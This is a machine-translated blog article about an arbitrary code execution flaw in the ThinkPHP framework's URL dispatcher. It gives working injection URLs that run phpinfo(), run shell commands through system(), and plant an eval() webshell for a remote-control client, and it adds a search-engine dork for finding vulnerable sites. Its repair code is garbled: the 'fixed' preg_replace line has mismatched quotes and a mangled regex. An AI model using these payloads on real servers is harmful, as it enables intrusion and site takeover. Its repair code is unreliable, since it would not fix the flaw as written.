Exploitation and Repair of Arbitrary Code Execution Vulnerability in ThinkPHP Framework

ThinkPHP is a famous open source PHP framework in China, which was born to simplify enterprise application development and agile WEB application development. It was first born in early 2006, formerly known as FCS, and officially renamed as ThinkPHP on New Year's Day in 2007, and was released according to Apache2 open source protocol. The early ideological framework originated from Struts, Later, after continuous improvement and perfection, At the same time, it also draws lessons from many excellent foreign frameworks and modes, uses object-oriented development structure and MVC mode, integrates Action and Dao ideas of Struts, TagLib (tag library) of JSP, ORM mapping and ActiveRecord mode of RoR, encapsulates CURD and some common operations, single 1 entry mode, etc., and has unique performance in template engine, cache mechanism, authentication mechanism and extensibility.

However, recently, an arbitrary code execution vulnerability broke out in thinkphp framework, which is quite harmful. The vulnerability exploitation methods are as follows:

index.php/module/aciton/param1/${@print(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

Where function_all stands for any function, such as:

index.php/module/aciton/param1/${@phpinfo()}

You can get the system configuration information of the server.

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

You can list Web site files

index.php/module/action/param1/{${eval($_POST[s])}}

You can directly execute a sentence code and connect it directly with a kitchen knife.

This allows hackers to get more lists of websites using the thinkphp framework directly through the google bulk search keyword: thinkphp intitle: System error. It can be seen that its harmfulness is quite great.

thinkphp Framework Executes Arbitrary Code Vulnerability Fix Method:

Users can download the officially released patch:

http://code.google.com/p/thinkphp/source/detail?spec=svn2904 & r=2838

Or modify the source code directly:

In the/ThinkPHP/Lib/Core/Dispatcher. class. php

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

Amend to read:

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

Change the double quotation marks in the second parameter of preg_replace to single quotation marks to prevent the php variable syntax from being parsed and executed.

Note: This article is for reference only, please do not use it for illegal purposes.

For more readers interested in thinkPHP related contents, please check the topics of this site: "ThinkPHP Introduction Tutorial", "thinkPHP Template Operation Skills Summary", "ThinkPHP Common Methods Summary", "smarty Template Introduction Basic Tutorial" and "PHP Template Technology Summary".

Hope that this article is based on ThinkPHP framework of PHP programming help.